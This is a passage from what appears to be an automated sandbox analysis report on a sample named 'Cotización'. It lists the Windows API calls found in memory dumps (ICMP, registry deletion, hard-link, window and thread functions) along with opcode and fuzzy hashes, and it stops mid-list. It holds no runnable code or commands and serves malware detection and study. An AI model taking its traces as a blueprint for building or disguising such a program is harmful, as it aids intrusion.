                • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: _wcslen$_wcscpy
                • String ID: 3, 3, 8, 1
                • API String ID: 3469035223-357260408
                • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
                APIs
                • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: AddressLibraryLoadProc
                • String ID: ICMP.DLL$IcmpCloseHandle
                • API String ID: 2574300362-3530519716
                • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                APIs
                • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: AddressLibraryLoadProc
                • String ID: ICMP.DLL$IcmpCreateFile
                • API String ID: 2574300362-275556492
                • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                APIs
                • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: AddressLibraryLoadProc
                • String ID: ICMP.DLL$IcmpSendEcho
                • API String ID: 2574300362-58917771
                • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                APIs
                • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: AddressLibraryLoadProc
                • String ID: RegDeleteKeyExW$advapi32.dll
                • API String ID: 2574300362-4033151799
                • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                APIs
                • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                • __itow.LIBCMT ref: 004699CD
                  • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                • __itow.LIBCMT ref: 00469A97
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: MessageSend$__itow
                • String ID:
                • API String ID: 3379773720-0
                • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                APIs
                • GetWindowRect.USER32(?,?), ref: 00449A4A
                • ScreenToClient.USER32(?,?), ref: 00449A80
                • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Window$ClientMoveRectScreen
                • String ID:
                • API String ID: 3880355969-0
                • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                • String ID:
                • API String ID: 2782032738-0
                • Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                • Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                APIs
                • ClientToScreen.USER32(00000000,?), ref: 0044169A
                • GetWindowRect.USER32(?,?), ref: 00441722
                • PtInRect.USER32(?,?,?), ref: 00441734
                • MessageBeep.USER32(00000000), ref: 004417AD
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Rect$BeepClientMessageScreenWindow
                • String ID:
                • API String ID: 1352109105-0
                • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                APIs
                • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: CreateHardLink$DeleteErrorFileLast
                • String ID:
                • API String ID: 3321077145-0
                • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                APIs
                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                • __isleadbyte_l.LIBCMT ref: 004208A6
                • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                • String ID:
                • API String ID: 3058430110-0
                • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                APIs
                • GetParent.USER32(?), ref: 004503C8
                • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Proc$Parent
                • String ID:
                • API String ID: 2351499541-0
                • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                APIs
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                • TranslateMessage.USER32(?), ref: 00442B01
                • DispatchMessageW.USER32(?), ref: 00442B0B
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Message$Peek$DispatchTranslate
                • String ID:
                • API String ID: 1795658109-0
                • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                APIs
                • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                  • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                  • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                  • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                • GetCaretPos.USER32(?), ref: 004743B2
                • ClientToScreen.USER32(00000000,?), ref: 004743E8
                • GetForegroundWindow.USER32 ref: 004743EE
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                • String ID:
                • API String ID: 2759813231-0
                • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                APIs
                  • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                • _wcslen.LIBCMT ref: 00449519
                • _wcslen.LIBCMT ref: 00449526
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: MessageSend_wcslen$_wcspbrk
                • String ID:
                • API String ID: 2886238975-0
                • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: __setmode$DebugOutputString_fprintf
                • String ID:
                • API String ID: 1792727568-0
                • Opcode ID: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                • Opcode Fuzzy Hash: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                APIs
                  • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
